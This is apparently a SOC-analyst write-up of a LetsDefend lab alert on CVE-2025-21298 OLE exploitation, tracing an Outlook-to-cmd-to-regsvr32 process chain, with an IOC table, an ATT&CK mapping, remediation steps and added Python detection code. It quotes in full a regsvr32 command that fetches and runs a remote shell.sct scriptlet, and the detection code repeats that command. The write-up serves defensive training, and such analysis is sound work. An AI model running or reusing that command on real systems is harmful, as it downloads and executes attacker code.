June 6, 2026
SOC336 — Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298) — LetsDefend
Rizwann
Zero-click vulnerabilities are among the most dangerous classes of attacks because they require little to no user interaction to achieve code execution
Event ID: 336 & Rule Name: SOC336 — Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)
In this investigation, I analyzed SOC336 — Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298) within the LetsDefend platform. I traced how a malicious email attachment led to suspicious command execution and remote payload retrieval activity on the endpoint.
The case demonstrates how attackers exploit trusted Windows components, phishing delivery mechanisms, and native system utilities to establish execution while blending into legitimate operating system behavior.
Alert Overview
Field | Value
Alert Name | Windows OLE Zero-Click RCE Exploitation Detected
Event ID | 336
Severity | Critical
CVE | CVE-2025-21298
Alert Type | Malware / Exploitation
Detection Rule | SOC336
Recipient | Austin@letsdefend.io
Sender | projectmanagement@pm.me
Verdict | True Positive
Understanding CVE-2025-21298
CVE-2025-21298 is a critical Windows OLE remote code execution vulnerability affecting the ole32.dll component responsible for Object Linking and Embedding (OLE) operations in Microsoft Windows.
The vulnerability can be triggered through specially crafted files containing malicious embedded OLE objects, commonly delivered through:
- RTF documents,
- phishing attachments,
- malicious embedded content.
What makes this vulnerability particularly dangerous is its potential for zero-click exploitation, meaning code execution may occur when the file is previewed or processed without requiring extensive user interaction.
Successful exploitation may allow attackers to:
- execute arbitrary code,
- download additional malware,
- establish persistence,
- exfiltrate sensitive information,
- gain remote access to the endpoint.
Initial Investigation
The investigation began with a review of the suspicious email delivered to the victim endpoint.
Observed Email Activity
The email:
- originated from an external sender,
- contained a suspicious attachment,
- triggered security detections,
- aligned with known phishing delivery behavior.
The sender IP was queried through threat intelligence feeds and was flagged as malicious based on previously observed suspicious activity.
This immediately elevated the alert severity and supported the likelihood of active exploitation attempts.
Attachment Analysis
The email attachment was identified as potentially malicious and associated with the CVE exploitation attempt.
The attachment likely leveraged:
- malicious embedded OLE objects,
- crafted RTF behavior,
- exploitation of vulnerable OLE parsing mechanisms.
This type of attack commonly abuses Office document rendering behavior to initiate execution chains on the endpoint.
Log 1.1 — Process Execution Analysis
The most critical evidence appeared within endpoint process execution logs.
Suspicious Command Observed
C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll
This command strongly indicates malicious activity and abuse of trusted Windows utilities.
Breaking Down the Command
Parent Process Chain
OUTLOOK.EXE
↓
cmd.exe
↓
regsvr32.exe
This process lineage is highly suspicious because normal email activity should not result in command-line execution followed by the retrieval of a remote script.
Why regsvr32.exe Was Suspicious
regsvr32.exe is a legitimate Windows utility typically used to register or unregister a DLL.
However, attackers frequently abuse it as a Living-off-the-Land Binary (LOLBIN) because:
- it is a trusted, Microsoft-signed Windows binary,
- it is often whitelisted,
- it is capable of executing remote scripts,
- it is useful for bypassing security controls.
Suspicious Parameters Identified
Parameter | Purpose
/s | Silent execution
/u | Unregister DLL
/i: | Pass the remote script location
scrobj.dll | Script execution via COM scripting
The following remote resource was contacted:
http://84.38.130.118.com/shell.sct
This indicates:
- outbound network communication,
- remote payload retrieval,
- script-based execution activity.
Why This Matters
This behavior aligns closely with:
- fileless malware execution,
- scriptlet abuse,
- LOLBIN exploitation,
- defense evasion techniques.
The .sct file extension represents a Windows Script Component commonly abused in malware campaigns.
Rather than dropping traditional executable malware to disk, attackers leverage trusted Windows utilities to execute scripts directly in memory, reducing detection opportunities.
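As an added illustration (not part of the original write-up), the following Python turns the command breakdown and process-lineage reasoning above into detection logic over constructed Sysmon-style process-creation events: it parses the regsvr32 switches and /i: URL, walks the parent chain, and escalates severity when an Office client sits at the top of the chain. The event fields, PIDs and the benign vendor OCX registration are constructed for the example.

```python
import re
from typing import Optional

# Constructed Sysmon-style process-creation events (not real telemetry): the chain
# from this write-up plus a benign regsvr32 registration of a vendor OCX for contrast.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "OUTLOOK.EXE", "cmdline": "OUTLOOK.EXE"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe", "cmdline":
     r"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"},
    {"pid": 300, "ppid": 200, "image": "regsvr32.exe", "cmdline":
     "regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"},
    {"pid": 400, "ppid": 1, "image": "msiexec.exe", "cmdline": "msiexec.exe /i setup.msi"},
    {"pid": 500, "ppid": 400, "image": "regsvr32.exe", "cmdline":
     r"regsvr32.exe /s C:\Vendor\control.ocx"},
]
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(?P<url>https?://\S+)", re.IGNORECASE)

def parse_regsvr32(cmdline: str) -> Optional[dict]:
    """Return switches, any remote /i: URL and the trailing DLL of a regsvr32 command line."""
    tokens = cmdline.split()
    if not tokens or not tokens[0].lower().endswith("regsvr32.exe"):
        return None  # only the regsvr32 process itself is parsed; cmd.exe shows up via lineage
    switches = {t.lower() for t in tokens[1:] if t.startswith("/") and not t.lower().startswith("/i:")}
    m = REMOTE_SCRIPTLET.search(cmdline)
    return {"switches": switches, "remote_url": m.group("url") if m else None, "dll": tokens[-1].lower()}

def lineage(events: list, pid: int) -> list:
    """Follow ppid links to the root and return the image chain, oldest ancestor first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]

def detect(events: list) -> list:
    """Flag regsvr32 runs that pull a remote scriptlet or load scrobj.dll (T1218.010)."""
    alerts = []
    for e in events:
        parsed = parse_regsvr32(e["cmdline"])
        if parsed is None or not (parsed["remote_url"] or parsed["dll"] == "scrobj.dll"):
            continue
        chain = lineage(events, e["pid"])
        # An Office client at the top of the chain is the write-up's key signal, so escalate.
        office = any(img.lower() in OFFICE_PARENTS for img in chain)
        alerts.append({"pid": e["pid"], "chain": " -> ".join(chain), "url": parsed["remote_url"],
                       "dll": parsed["dll"], "severity": "critical" if office else "high"})
    return alerts
```

Running `detect(EVENTS)` yields a single critical alert for PID 300 with the chain OUTLOOK.EXE -> cmd.exe -> regsvr32.exe, while the vendor OCX registration under msiexec.exe produces nothing.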
Network Activity Analysis
Log management data confirmed that the endpoint's outbound traffic to the malicious remote host was permitted.
This indicates:
- the remote script retrieval succeeded,
- the endpoint established communication with attacker-controlled infrastructure, and
- follow-on execution activity may have occurred.
The successful outbound request significantly increases the confidence level of compromise.
Threat Assessment
This incident should be classified as a True Positive for an exploitation and malware execution event.
The investigation identified:
- phishing delivery,
- malicious attachment activity,
- exploitation behavior,
- suspicious process lineage,
- LOLBIN abuse,
- remote script retrieval,
- outbound C2 communication attempts.
The observed activity strongly suggests active exploitation rather than benign behavior.
MITRE ATT&CK Mapping
Tactic | Technique | ID
Initial Access | Phishing Attachment | T1566.001
Execution | Command and Scripting Interpreter: CMD | T1059.003
Execution | Visual Basic / Script Execution | T1059
Defense Evasion | Signed Binary Proxy Execution: Regsvr32 | T1218.010
Command and Control | Application Layer Protocol | T1071.001
Persistence | Script-Based Execution | T1059
Exploitation | Exploit Public-Facing/Client Application | T1203
Mapping activity to ATT&CK techniques helps standardize incident analysis and improve threat detection engineering.
Indicators of Compromise (IOCs)
IOC Type | Value
Malicious URL | http://84.38.130.118.com/shell.sct
LOLBIN Utility | regsvr32.exe
Suspicious DLL | scrobj.dll
Parent Process | OUTLOOK.EXE
Child Process | cmd.exe
Network Activity | Remote script retrieval
Vulnerability | CVE-2025-21298
These indicators can support:
- enterprise threat hunting,
- SIEM detection tuning,
- IOC blocking,
- endpoint monitoring improvements.
Containment and Remediation
Immediate Response Actions
- Isolate the affected endpoint
- Block malicious IP/domain communication
- Terminate suspicious regsvr32 activity
- Remove downloaded payloads or persistence artifacts
- Review additional endpoint activity
- Reset potentially exposed credentials
Long-Term Security Improvements
- Patch vulnerable Windows systems
- Disable unnecessary OLE object handling where feasible
- Monitor regsvr32 abuse activity
- Restrict outbound script retrieval
- Enhance EDR process lineage monitoring
- Improve phishing attachment controls
- Strengthen PowerShell and LOLBIN detections
Lessons Learned
This investigation reinforced several important defensive security lessons.
1. Trusted Windows Utilities Can Be Weaponized
Attackers frequently abuse native binaries such as:
- regsvr32.exe,
- PowerShell,
- cmd.exe
to evade traditional security controls.
2. Process Lineage Provides Critical Context
The chain:
OUTLOOK.EXE → cmd.exe → regsvr32.exe
immediately exposed abnormal execution behavior.
3. Zero-Click and Low-Interaction Attacks Are High Risk
Even limited interaction with malicious documents can trigger execution chains that download and execute remote payloads.
4. Network Telemetry Strengthens Investigations
Outbound requests to the attacker infrastructure provided strong evidence of exploitation.
Final Verdict
Based on the endpoint telemetry, process lineage, and network activity, this investigation confirms a True Positive exploitation attempt involving CVE-2025-21298.
The attack leveraged:
- phishing delivery,
- malicious OLE content,
- regsvr32 LOLBIN abuse,
- remote script execution,
- outbound payload retrieval.
This case highlights the continued effectiveness of phishing-based exploitation combined with trusted Windows binaries. It emphasizes the importance of behavioral monitoring, process analysis, and proactive endpoint detection within modern SOC operations.